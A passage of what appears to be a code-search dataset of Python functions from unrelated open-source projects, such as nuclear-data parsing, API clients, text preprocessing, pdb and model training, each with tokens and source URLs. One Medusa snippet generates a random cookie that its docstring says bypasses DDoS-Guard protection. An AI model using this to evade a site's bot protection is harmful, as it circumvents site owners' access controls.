"# Calculate yield as ratio",
"yield_",
"=",
"np",
".",
"zeros_like",
"(",
"energy",
")",
"yield_",
"[",
"idx",
"]",
"=",
"photon_prod_xs",
"[",
"idx",
"]",
"/",
"neutron_xs",
"[",
"idx",
"]",
"photon",
".",
"yield_",
"=",
"Tabulated1D",
"(",
"energy",
",",
"yield_",
")",
"# Get photon energy distribution",
"law",
"=",
"items",
"[",
"3",
"]",
"dist",
"=",
"UncorrelatedAngleEnergy",
"(",
")",
"if",
"law",
"==",
"1",
":",
"# TODO: Get file 15 distribution",
"pass",
"elif",
"law",
"==",
"2",
":",
"energy",
"=",
"items",
"[",
"1",
"]",
"primary_flag",
"=",
"items",
"[",
"2",
"]",
"dist",
".",
"energy",
"=",
"DiscretePhoton",
"(",
"primary_flag",
",",
"energy",
",",
"ev",
".",
"target",
"[",
"'mass'",
"]",
")",
"photon",
".",
"distribution",
".",
"append",
"(",
"dist",
")",
"products",
".",
"append",
"(",
"photon",
")",
"return",
"products"
] |
https://github.com/openmc-dev/openmc/blob/0cf7d9283786677e324bfbdd0984a54d1c86dacc/openmc/data/reaction.py#L664-L772
|
|
google/grr
|
8ad8a4d2c5a93c92729206b7771af19d92d4f915
|
api_client/python/grr_api_client/hunt.py
|
python
|
HuntBase.GetClientCompletionStats
|
(
self)
|
return response
|
[] |
def GetClientCompletionStats(
self) -> hunt_pb2.ApiGetHuntClientCompletionStatsResult:
args = hunt_pb2.ApiGetHuntClientCompletionStatsArgs(hunt_id=self.hunt_id)
response = self._context.SendRequest("GetHuntClientCompletionStats", args)
if not isinstance(response, hunt_pb2.ApiGetHuntClientCompletionStatsResult):
raise TypeError(f"Unexpected response type: '{type(response)}'")
return response
|
[
"def",
"GetClientCompletionStats",
"(",
"self",
")",
"->",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsResult",
":",
"args",
"=",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsArgs",
"(",
"hunt_id",
"=",
"self",
".",
"hunt_id",
")",
"response",
"=",
"self",
".",
"_context",
".",
"SendRequest",
"(",
"\"GetHuntClientCompletionStats\"",
",",
"args",
")",
"if",
"not",
"isinstance",
"(",
"response",
",",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsResult",
")",
":",
"raise",
"TypeError",
"(",
"f\"Unexpected response type: '{type(response)}'\"",
")",
"return",
"response"
] |
https://github.com/google/grr/blob/8ad8a4d2c5a93c92729206b7771af19d92d4f915/api_client/python/grr_api_client/hunt.py#L334-L342
|
|||
jbjorne/TEES
|
caf19a4a1352ac59f5dc13a8684cc42ce4342d9d
|
ExampleBuilders/FeatureBuilders/DrugFeatureBuilder.py
|
python
|
DrugFeatureBuilder.buildMTMXFeatures
|
(self, e1, e2)
|
[] |
def buildMTMXFeatures(self, e1, e2):
names = self.getMTMXAttrs(e1, e2, "mtmxName")
self.setFeature("mtmxNames-" + "-".join(names))
if names[0] == names[1]:
if names[0] in ["", "none"]:
self.setFeature("mtmxNames-both_unknown")
else:
self.setFeature("mtmxNames-both_identical")
self.setFeature("mtmxShortNames-" + "-".join(self.getMTMXAttrs(e1, e2, "mtmxNameShort")))
mtmxCuis = self.getMTMXAttrs(e1, e2, "mtmxCui")
for mtmxCui in mtmxCuis:
self.setFeature("mtmxCui_" + mtmxCui)
self.setFeature("mtmxCuis-" + "-".join(mtmxCuis))
# Probabilities
rv = self.getMTMXAttrs(e1, e2, "mtmxProb")
if rv[0] in ["", "none"]: rv[0] = "0"
if rv[1] in ["", "none"]: rv[1] = "0"
rv[0] = int(rv[0])
rv[1] = int(rv[1])
assert rv[0] <= 1000 and rv[1] <= 1000, (rv[0], rv[1])
rv.sort()
self.setFeature("mtmxProbMin", float(rv[0]) / 1000.0)
self.setFeature("mtmxProbMax", float(rv[1]) / 1000.0)
# Semtypes
sem = self.getMTMXAttrs(e1, e2, "mtmxSemTypes")
#print sem
for i in sem[0].split(","):
for j in sem[1].split(","):
semPair = [i, j]
semPair.sort()
#print "semPair", semPair
self.setFeature("semPair-" + "-".join(semPair))
self.setFeature("semType-" + i)
self.setFeature("semType-" + j)
|
[
"def",
"buildMTMXFeatures",
"(",
"self",
",",
"e1",
",",
"e2",
")",
":",
"names",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxName\"",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-\"",
"+",
"\"-\"",
".",
"join",
"(",
"names",
")",
")",
"if",
"names",
"[",
"0",
"]",
"==",
"names",
"[",
"1",
"]",
":",
"if",
"names",
"[",
"0",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-both_unknown\"",
")",
"else",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-both_identical\"",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxShortNames-\"",
"+",
"\"-\"",
".",
"join",
"(",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxNameShort\"",
")",
")",
")",
"mtmxCuis",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxCui\"",
")",
"for",
"mtmxCui",
"in",
"mtmxCuis",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxCui_\"",
"+",
"mtmxCui",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxCuis-\"",
"+",
"\"-\"",
".",
"join",
"(",
"mtmxCuis",
")",
")",
"# Probabilities",
"rv",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxProb\"",
")",
"if",
"rv",
"[",
"0",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"rv",
"[",
"0",
"]",
"=",
"\"0\"",
"if",
"rv",
"[",
"1",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"rv",
"[",
"1",
"]",
"=",
"\"0\"",
"rv",
"[",
"0",
"]",
"=",
"int",
"(",
"rv",
"[",
"0",
"]",
")",
"rv",
"[",
"1",
"]",
"=",
"int",
"(",
"rv",
"[",
"1",
"]",
")",
"assert",
"rv",
"[",
"0",
"]",
"<=",
"1000",
"and",
"rv",
"[",
"1",
"]",
"<=",
"1000",
",",
"(",
"rv",
"[",
"0",
"]",
",",
"rv",
"[",
"1",
"]",
")",
"rv",
".",
"sort",
"(",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxProbMin\"",
",",
"float",
"(",
"rv",
"[",
"0",
"]",
")",
"/",
"1000.0",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxProbMax\"",
",",
"float",
"(",
"rv",
"[",
"1",
"]",
")",
"/",
"1000.0",
")",
"# Semtypes",
"sem",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxSemTypes\"",
")",
"#print sem",
"for",
"i",
"in",
"sem",
"[",
"0",
"]",
".",
"split",
"(",
"\",\"",
")",
":",
"for",
"j",
"in",
"sem",
"[",
"1",
"]",
".",
"split",
"(",
"\",\"",
")",
":",
"semPair",
"=",
"[",
"i",
",",
"j",
"]",
"semPair",
".",
"sort",
"(",
")",
"#print \"semPair\", semPair",
"self",
".",
"setFeature",
"(",
"\"semPair-\"",
"+",
"\"-\"",
".",
"join",
"(",
"semPair",
")",
")",
"self",
".",
"setFeature",
"(",
"\"semType-\"",
"+",
"i",
")",
"self",
".",
"setFeature",
"(",
"\"semType-\"",
"+",
"j",
")"
] |
https://github.com/jbjorne/TEES/blob/caf19a4a1352ac59f5dc13a8684cc42ce4342d9d/ExampleBuilders/FeatureBuilders/DrugFeatureBuilder.py#L96-L129
|
||||
twilio/twilio-python
|
6e1e811ea57a1edfadd5161ace87397c563f6915
|
twilio/rest/voice/v1/byoc_trunk.py
|
python
|
ByocTrunkInstance.voice_method
|
(self)
|
return self._properties['voice_method']
|
:returns: The HTTP method to use with voice_url
:rtype: unicode
|
:returns: The HTTP method to use with voice_url
:rtype: unicode
|
[
":",
"returns",
":",
"The",
"HTTP",
"method",
"to",
"use",
"with",
"voice_url",
":",
"rtype",
":",
"unicode"
] |
def voice_method(self):
"""
:returns: The HTTP method to use with voice_url
:rtype: unicode
"""
return self._properties['voice_method']
|
[
"def",
"voice_method",
"(",
"self",
")",
":",
"return",
"self",
".",
"_properties",
"[",
"'voice_method'",
"]"
] |
https://github.com/twilio/twilio-python/blob/6e1e811ea57a1edfadd5161ace87397c563f6915/twilio/rest/voice/v1/byoc_trunk.py#L390-L395
|
|
saimadhu-polamuri/DataAspirant_codes
|
4adfdad255a90ef39fca1bf83a927ffb129dda78
|
text_preprocessing_techniques/scripts/preprocessing.py
|
python
|
Preprocess.emoticons_words
|
(self, text)
|
return text
|
Return :- string after converting emoticons to words
Input :- String
Output :- String
|
Return :- string after converting emoticons to words
Input :- String
Output :- String
|
[
"Return",
":",
"-",
"string",
"after",
"converting",
"emoticons",
"to",
"words",
"Input",
":",
"-",
"String",
"Output",
":",
"-",
"String"
] |
def emoticons_words(self, text):
"""
Return :- string after converting emoticons to words
Input :- String
Output :- String
"""
for emot in EMOTICONS:
emoticon_pattern = r'('+emot+')'
# replace
emoticon_words = EMOTICONS[emot]
replace_text = emoticon_words.replace(",","")
replace_text = replace_text.replace(":","")
replace_text_list = replace_text.split()
emoticon_name = '_'.join(replace_text_list)
text = re.sub(emoticon_pattern, emoticon_name, text)
return text
|
[
"def",
"emoticons_words",
"(",
"self",
",",
"text",
")",
":",
"for",
"emot",
"in",
"EMOTICONS",
":",
"emoticon_pattern",
"=",
"r'('",
"+",
"emot",
"+",
"')'",
"# replace ",
"emoticon_words",
"=",
"EMOTICONS",
"[",
"emot",
"]",
"replace_text",
"=",
"emoticon_words",
".",
"replace",
"(",
"\",\"",
",",
"\"\"",
")",
"replace_text",
"=",
"replace_text",
".",
"replace",
"(",
"\":\"",
",",
"\"\"",
")",
"replace_text_list",
"=",
"replace_text",
".",
"split",
"(",
")",
"emoticon_name",
"=",
"'_'",
".",
"join",
"(",
"replace_text_list",
")",
"text",
"=",
"re",
".",
"sub",
"(",
"emoticon_pattern",
",",
"emoticon_name",
",",
"text",
")",
"return",
"text"
] |
https://github.com/saimadhu-polamuri/DataAspirant_codes/blob/4adfdad255a90ef39fca1bf83a927ffb129dda78/text_preprocessing_techniques/scripts/preprocessing.py#L265-L280
|
|
pymedusa/Medusa
|
1405fbb6eb8ef4d20fcca24c32ddca52b11f0f38
|
medusa/providers/torrent/html/anidex.py
|
python
|
AniDexProvider.random_sixteen
|
()
|
return ''.join(random.choice(
string.ascii_uppercase + string.ascii_lowercase + string.digits
) for _ in range(16))
|
Create 16 character string, for cookies.
This will bypass DDos-guard.net protection
|
Create 16 character string, for cookies.
|
[
"Create",
"16",
"character",
"string",
"for",
"cookies",
"."
] |
def random_sixteen():
"""
Create 16 character string, for cookies.
This will bypass DDos-guard.net protection
"""
return ''.join(random.choice(
string.ascii_uppercase + string.ascii_lowercase + string.digits
) for _ in range(16))
|
[
"def",
"random_sixteen",
"(",
")",
":",
"return",
"''",
".",
"join",
"(",
"random",
".",
"choice",
"(",
"string",
".",
"ascii_uppercase",
"+",
"string",
".",
"ascii_lowercase",
"+",
"string",
".",
"digits",
")",
"for",
"_",
"in",
"range",
"(",
"16",
")",
")"
] |
https://github.com/pymedusa/Medusa/blob/1405fbb6eb8ef4d20fcca24c32ddca52b11f0f38/medusa/providers/torrent/html/anidex.py#L53-L61
|
|
albertz/music-player
|
d23586f5bf657cbaea8147223be7814d117ae73d
|
mac/pyobjc-framework-Quartz/Examples/Programming with Quartz/BasicDrawing/AppDrawing.py
|
python
|
doJPEGDocumentWithMultipleProfiles
|
(context)
|
[] |
def doJPEGDocumentWithMultipleProfiles(context):
url = GetURL(kOurSubstituteJPG)
if url is not None:
Images.drawJPEGDocumentWithMultipleProfiles(context, url)
|
[
"def",
"doJPEGDocumentWithMultipleProfiles",
"(",
"context",
")",
":",
"url",
"=",
"GetURL",
"(",
"kOurSubstituteJPG",
")",
"if",
"url",
"is",
"not",
"None",
":",
"Images",
".",
"drawJPEGDocumentWithMultipleProfiles",
"(",
"context",
",",
"url",
")"
] |
https://github.com/albertz/music-player/blob/d23586f5bf657cbaea8147223be7814d117ae73d/mac/pyobjc-framework-Quartz/Examples/Programming with Quartz/BasicDrawing/AppDrawing.py#L123-L127
|
||||
eirannejad/pyRevit
|
49c0b7eb54eb343458ce1365425e6552d0c47d44
|
site-packages/sqlalchemy/orm/events.py
|
python
|
InstanceEvents.init
|
(self, target, args, kwargs)
|
Receive an instance when its constructor is called.
This method is only called during a userland construction of
an object, in conjunction with the object's constructor, e.g.
its ``__init__`` method. It is not called when an object is
loaded from the database; see the :meth:`.InstanceEvents.load`
event in order to intercept a database load.
The event is called before the actual ``__init__`` constructor
of the object is called. The ``kwargs`` dictionary may be
modified in-place in order to affect what is passed to
``__init__``.
:param target: the mapped instance. If
the event is configured with ``raw=True``, this will
instead be the :class:`.InstanceState` state-management
object associated with the instance.
:param args: positional arguments passed to the ``__init__`` method.
This is passed as a tuple and is currently immutable.
:param kwargs: keyword arguments passed to the ``__init__`` method.
This structure *can* be altered in place.
.. seealso::
:meth:`.InstanceEvents.init_failure`
:meth:`.InstanceEvents.load`
|
Receive an instance when its constructor is called.
|
[
"Receive",
"an",
"instance",
"when",
"its",
"constructor",
"is",
"called",
"."
] |
def init(self, target, args, kwargs):
"""Receive an instance when its constructor is called.
This method is only called during a userland construction of
an object, in conjunction with the object's constructor, e.g.
its ``__init__`` method. It is not called when an object is
loaded from the database; see the :meth:`.InstanceEvents.load`
event in order to intercept a database load.
The event is called before the actual ``__init__`` constructor
of the object is called. The ``kwargs`` dictionary may be
modified in-place in order to affect what is passed to
``__init__``.
:param target: the mapped instance. If
the event is configured with ``raw=True``, this will
instead be the :class:`.InstanceState` state-management
object associated with the instance.
:param args: positional arguments passed to the ``__init__`` method.
This is passed as a tuple and is currently immutable.
:param kwargs: keyword arguments passed to the ``__init__`` method.
This structure *can* be altered in place.
.. seealso::
:meth:`.InstanceEvents.init_failure`
:meth:`.InstanceEvents.load`
"""
|
[
"def",
"init",
"(",
"self",
",",
"target",
",",
"args",
",",
"kwargs",
")",
":"
] |
https://github.com/eirannejad/pyRevit/blob/49c0b7eb54eb343458ce1365425e6552d0c47d44/site-packages/sqlalchemy/orm/events.py#L227-L256
|
||
twisted/twisted
|
dee676b040dd38b847ea6fb112a712cb5e119490
|
src/twisted/trial/runner.py
|
python
|
isPackageDirectory
|
(dirname)
|
return False
|
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
|
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
|
[
"Is",
"the",
"directory",
"at",
"path",
"dirname",
"a",
"Python",
"package",
"directory?",
"Returns",
"the",
"name",
"of",
"the",
"__init__",
"file",
"(",
"it",
"may",
"have",
"a",
"weird",
"extension",
")",
"if",
"dirname",
"is",
"a",
"package",
"directory",
".",
"Otherwise",
"returns",
"False"
] |
def isPackageDirectory(dirname):
"""
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
"""
def _getSuffixes():
return importlib.machinery.all_suffixes()
for ext in _getSuffixes():
initFile = "__init__" + ext
if os.path.exists(os.path.join(dirname, initFile)):
return initFile
return False
|
[
"def",
"isPackageDirectory",
"(",
"dirname",
")",
":",
"def",
"_getSuffixes",
"(",
")",
":",
"return",
"importlib",
".",
"machinery",
".",
"all_suffixes",
"(",
")",
"for",
"ext",
"in",
"_getSuffixes",
"(",
")",
":",
"initFile",
"=",
"\"__init__\"",
"+",
"ext",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"os",
".",
"path",
".",
"join",
"(",
"dirname",
",",
"initFile",
")",
")",
":",
"return",
"initFile",
"return",
"False"
] |
https://github.com/twisted/twisted/blob/dee676b040dd38b847ea6fb112a712cb5e119490/src/twisted/trial/runner.py#L64-L78
|
|
TheSouthFrog/stylealign
|
910632d2fccc9db61b00c265ae18a88913113c1d
|
util/buffer.py
|
python
|
BufferedWrapper.__next__
|
(self)
|
return result
|
[] |
def __next__(self):
result = self.buffer_.get()
self._async_next()
return result
|
[
"def",
"__next__",
"(",
"self",
")",
":",
"result",
"=",
"self",
".",
"buffer_",
".",
"get",
"(",
")",
"self",
".",
"_async_next",
"(",
")",
"return",
"result"
] |
https://github.com/TheSouthFrog/stylealign/blob/910632d2fccc9db61b00c265ae18a88913113c1d/util/buffer.py#L17-L20
|
|||
ESCOMP/CESM
|
4e21488773baa1bd9fb06fb8750db9f9bd12b705
|
manage_externals/manic/repository_svn.py
|
python
|
SvnRepository.__init__
|
(self, component_name, repo, ignore_ancestry=False)
|
Parse repo (a <repo> XML element).
|
Parse repo (a <repo> XML element).
|
[
"Parse",
"repo",
"(",
"a",
"<repo",
">",
"XML",
"element",
")",
"."
] |
def __init__(self, component_name, repo, ignore_ancestry=False):
"""
Parse repo (a <repo> XML element).
"""
Repository.__init__(self, component_name, repo)
self._ignore_ancestry = ignore_ancestry
if self._branch:
self._url = os.path.join(self._url, self._branch)
elif self._tag:
self._url = os.path.join(self._url, self._tag)
else:
msg = "DEV_ERROR in svn repository. Shouldn't be here!"
fatal_error(msg)
|
[
"def",
"__init__",
"(",
"self",
",",
"component_name",
",",
"repo",
",",
"ignore_ancestry",
"=",
"False",
")",
":",
"Repository",
".",
"__init__",
"(",
"self",
",",
"component_name",
",",
"repo",
")",
"self",
".",
"_ignore_ancestry",
"=",
"ignore_ancestry",
"if",
"self",
".",
"_branch",
":",
"self",
".",
"_url",
"=",
"os",
".",
"path",
".",
"join",
"(",
"self",
".",
"_url",
",",
"self",
".",
"_branch",
")",
"elif",
"self",
".",
"_tag",
":",
"self",
".",
"_url",
"=",
"os",
".",
"path",
".",
"join",
"(",
"self",
".",
"_url",
",",
"self",
".",
"_tag",
")",
"else",
":",
"msg",
"=",
"\"DEV_ERROR in svn repository. Shouldn't be here!\"",
"fatal_error",
"(",
"msg",
")"
] |
https://github.com/ESCOMP/CESM/blob/4e21488773baa1bd9fb06fb8750db9f9bd12b705/manage_externals/manic/repository_svn.py#L40-L52
|
||
jython/jython3
|
def4f8ec47cb7a9c799ea4c745f12badf92c5769
|
lib-python/3.5.1/idlelib/SearchDialogBase.py
|
python
|
SearchDialogBase.create_command_buttons
|
(self)
|
Place buttons in vertical command frame gridded on right.
|
Place buttons in vertical command frame gridded on right.
|
[
"Place",
"buttons",
"in",
"vertical",
"command",
"frame",
"gridded",
"on",
"right",
"."
] |
def create_command_buttons(self):
"Place buttons in vertical command frame gridded on right."
f = self.buttonframe = Frame(self.top)
f.grid(row=0,column=2,padx=2,pady=2,ipadx=2,ipady=2)
b = self.make_button("close", self.close)
b.lower()
|
[
"def",
"create_command_buttons",
"(",
"self",
")",
":",
"f",
"=",
"self",
".",
"buttonframe",
"=",
"Frame",
"(",
"self",
".",
"top",
")",
"f",
".",
"grid",
"(",
"row",
"=",
"0",
",",
"column",
"=",
"2",
",",
"padx",
"=",
"2",
",",
"pady",
"=",
"2",
",",
"ipadx",
"=",
"2",
",",
"ipady",
"=",
"2",
")",
"b",
"=",
"self",
".",
"make_button",
"(",
"\"close\"",
",",
"self",
".",
"close",
")",
"b",
".",
"lower",
"(",
")"
] |
https://github.com/jython/jython3/blob/def4f8ec47cb7a9c799ea4c745f12badf92c5769/lib-python/3.5.1/idlelib/SearchDialogBase.py#L173-L179
|
||
cloudera/hue
|
23f02102d4547c17c32bd5ea0eb24e9eadd657a4
|
desktop/core/ext-py/boto-2.46.1/boto/cloudsearch/domain.py
|
python
|
Domain.index_documents
|
(self)
|
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
|
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
|
[
"Tells",
"the",
"search",
"domain",
"to",
"start",
"indexing",
"its",
"documents",
"using",
"the",
"latest",
"text",
"processing",
"options",
"and",
"IndexFields",
".",
"This",
"operation",
"must",
"be",
"invoked",
"to",
"make",
"options",
"whose",
"OptionStatus",
"has",
"OptioState",
"of",
"RequiresIndexDocuments",
"visible",
"in",
"search",
"results",
"."
] |
def index_documents(self):
"""
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
"""
self.layer1.index_documents(self.name)
|
[
"def",
"index_documents",
"(",
"self",
")",
":",
"self",
".",
"layer1",
".",
"index_documents",
"(",
"self",
".",
"name",
")"
] |
https://github.com/cloudera/hue/blob/23f02102d4547c17c32bd5ea0eb24e9eadd657a4/desktop/core/ext-py/boto-2.46.1/boto/cloudsearch/domain.py#L224-L232
|
||
PaddlePaddle/Research
|
2da0bd6c72d60e9df403aff23a7802779561c4a1
|
NLP/EMNLP2019-MAL/src/beam_search.py
|
python
|
BeamSearch.grow_finished
|
(self, i, finished_seq, finished_scores, finished_flags, curr_seq,
curr_scores, curr_finished)
|
return self.compute_topk_scores_and_seq(curr_finished_seq, curr_finished_scores,
curr_finished_scores, curr_finished_flags,
pick_finish=True)
|
grow_finished
|
grow_finished
|
[
"grow_finished"
] |
def grow_finished(self, i, finished_seq, finished_scores, finished_flags, curr_seq,
curr_scores, curr_finished):
"""
grow_finished
"""
finished_seq = layers.concat([finished_seq,
layers.fill_constant([self.batch_size, self.beam_size, 1], dtype='int64', value=0)],
axis=2)
curr_scores = curr_scores + (1.0 - layers.cast(curr_finished, 'int64')) * -INF
curr_finished_seq = layers.concat([finished_seq, curr_seq], axis=1)
curr_finished_scores = layers.concat([finished_scores, curr_scores], axis=1)
curr_finished_flags = layers.concat([finished_flags, curr_finished], axis=1)
return self.compute_topk_scores_and_seq(curr_finished_seq, curr_finished_scores,
curr_finished_scores, curr_finished_flags,
pick_finish=True)
|
[
"def",
"grow_finished",
"(",
"self",
",",
"i",
",",
"finished_seq",
",",
"finished_scores",
",",
"finished_flags",
",",
"curr_seq",
",",
"curr_scores",
",",
"curr_finished",
")",
":",
"finished_seq",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_seq",
",",
"layers",
".",
"fill_constant",
"(",
"[",
"self",
".",
"batch_size",
",",
"self",
".",
"beam_size",
",",
"1",
"]",
",",
"dtype",
"=",
"'int64'",
",",
"value",
"=",
"0",
")",
"]",
",",
"axis",
"=",
"2",
")",
"curr_scores",
"=",
"curr_scores",
"+",
"(",
"1.0",
"-",
"layers",
".",
"cast",
"(",
"curr_finished",
",",
"'int64'",
")",
")",
"*",
"-",
"INF",
"curr_finished_seq",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_seq",
",",
"curr_seq",
"]",
",",
"axis",
"=",
"1",
")",
"curr_finished_scores",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_scores",
",",
"curr_scores",
"]",
",",
"axis",
"=",
"1",
")",
"curr_finished_flags",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_flags",
",",
"curr_finished",
"]",
",",
"axis",
"=",
"1",
")",
"return",
"self",
".",
"compute_topk_scores_and_seq",
"(",
"curr_finished_seq",
",",
"curr_finished_scores",
",",
"curr_finished_scores",
",",
"curr_finished_flags",
",",
"pick_finish",
"=",
"True",
")"
] |
https://github.com/PaddlePaddle/Research/blob/2da0bd6c72d60e9df403aff23a7802779561c4a1/NLP/EMNLP2019-MAL/src/beam_search.py#L142-L159
|
|
python/cpython
|
e13cdca0f5224ec4e23bdd04bb3120506964bc8b
|
Lib/pdb.py
|
python
|
Pdb.lookupmodule
|
(self, filename)
|
return None
|
Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
|
Helper function for break/clear parsing -- may be overridden.
|
[
"Helper",
"function",
"for",
"break",
"/",
"clear",
"parsing",
"--",
"may",
"be",
"overridden",
"."
] |
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
|
[
"def",
"lookupmodule",
"(",
"self",
",",
"filename",
")",
":",
"if",
"os",
".",
"path",
".",
"isabs",
"(",
"filename",
")",
"and",
"os",
".",
"path",
".",
"exists",
"(",
"filename",
")",
":",
"return",
"filename",
"f",
"=",
"os",
".",
"path",
".",
"join",
"(",
"sys",
".",
"path",
"[",
"0",
"]",
",",
"filename",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"f",
")",
"and",
"self",
".",
"canonic",
"(",
"f",
")",
"==",
"self",
".",
"mainpyfile",
":",
"return",
"f",
"root",
",",
"ext",
"=",
"os",
".",
"path",
".",
"splitext",
"(",
"filename",
")",
"if",
"ext",
"==",
"''",
":",
"filename",
"=",
"filename",
"+",
"'.py'",
"if",
"os",
".",
"path",
".",
"isabs",
"(",
"filename",
")",
":",
"return",
"filename",
"for",
"dirname",
"in",
"sys",
".",
"path",
":",
"while",
"os",
".",
"path",
".",
"islink",
"(",
"dirname",
")",
":",
"dirname",
"=",
"os",
".",
"readlink",
"(",
"dirname",
")",
"fullname",
"=",
"os",
".",
"path",
".",
"join",
"(",
"dirname",
",",
"filename",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"fullname",
")",
":",
"return",
"fullname",
"return",
"None"
] |
https://github.com/python/cpython/blob/e13cdca0f5224ec4e23bdd04bb3120506964bc8b/Lib/pdb.py#L1601-L1623
|
|
baidu/knowledge-driven-dialogue
|
ba85518a1ac2a57988188fc5f2b8fe42e1facf64
|
generative_pt/network.py
|
python
|
main
|
()
|
main
|
main
|
[
"main"
] |
def main():
"""
main
"""
config = model_config()
if config.check:
config.save_dir = "./tmp/"
config.use_gpu = torch.cuda.is_available() and config.gpu >= 0
device = config.gpu
torch.cuda.set_device(device)
# Data definition
corpus = KnowledgeCorpus(data_dir=config.data_dir, data_prefix=config.data_prefix,
min_freq=0, max_vocab_size=config.max_vocab_size,
min_len=config.min_len, max_len=config.max_len,
embed_file=config.embed_file, with_label=config.with_label,
share_vocab=config.share_vocab)
corpus.load()
if config.test and config.ckpt:
corpus.reload(data_type='test')
train_iter = corpus.create_batches(
config.batch_size, "train", shuffle=True, device=device)
valid_iter = corpus.create_batches(
config.batch_size, "valid", shuffle=False, device=device)
test_iter = corpus.create_batches(
config.batch_size, "test", shuffle=False, device=device)
# Model definition
model = KnowledgeSeq2Seq(src_vocab_size=corpus.SRC.vocab_size,
tgt_vocab_size=corpus.TGT.vocab_size,
embed_size=config.embed_size, hidden_size=config.hidden_size,
padding_idx=corpus.padding_idx,
num_layers=config.num_layers, bidirectional=config.bidirectional,
attn_mode=config.attn, with_bridge=config.with_bridge,
tie_embedding=config.tie_embedding, dropout=config.dropout,
use_gpu=config.use_gpu,
use_bow=config.use_bow, use_dssm=config.use_dssm,
use_pg=config.use_pg, use_gs=config.use_gs,
pretrain_epoch=config.pretrain_epoch,
use_posterior=config.use_posterior,
weight_control=config.weight_control,
concat=config.decode_concat)
model_name = model.__class__.__name__
# Generator definition
generator = TopKGenerator(model=model,
src_field=corpus.SRC, tgt_field=corpus.TGT, cue_field=corpus.CUE,
max_length=config.max_dec_len, ignore_unk=config.ignore_unk,
length_average=config.length_average, use_gpu=config.use_gpu)
# Interactive generation testing
if config.interact and config.ckpt:
model.load(config.ckpt)
return generator
# Testing
elif config.test and config.ckpt:
print(model)
model.load(config.ckpt)
print("Testing ...")
metrics, scores = evaluate(model, test_iter)
print(metrics.report_cum())
print("Generating ...")
evaluate_generation(generator, test_iter, save_file=config.gen_file, verbos=True)
else:
# Load word embeddings
if config.use_embed and config.embed_file is not None:
model.encoder.embedder.load_embeddings(
corpus.SRC.embeddings, scale=0.03)
model.decoder.embedder.load_embeddings(
corpus.TGT.embeddings, scale=0.03)
# Optimizer definition
optimizer = getattr(torch.optim, config.optimizer)(
model.parameters(), lr=config.lr)
# Learning rate scheduler
if config.lr_decay is not None and 0 < config.lr_decay < 1.0:
lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
factor=config.lr_decay, patience=1, verbose=True, min_lr=1e-5)
else:
lr_scheduler = None
# Save directory
date_str, time_str = datetime.now().strftime("%Y%m%d-%H%M%S").split("-")
result_str = "{}-{}".format(model_name, time_str)
if not os.path.exists(config.save_dir):
os.makedirs(config.save_dir)
# Logger definition
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, format="%(message)s")
fh = logging.FileHandler(os.path.join(config.save_dir, "train.log"))
logger.addHandler(fh)
# Save config
params_file = os.path.join(config.save_dir, "params.json")
with open(params_file, 'w') as fp:
json.dump(config.__dict__, fp, indent=4, sort_keys=True)
print("Saved params to '{}'".format(params_file))
logger.info(model)
# Train
logger.info("Training starts ...")
trainer = Trainer(model=model, optimizer=optimizer, train_iter=train_iter,
valid_iter=valid_iter, logger=logger, generator=generator,
valid_metric_name="-loss", num_epochs=config.num_epochs,
save_dir=config.save_dir, log_steps=config.log_steps,
valid_steps=config.valid_steps, grad_clip=config.grad_clip,
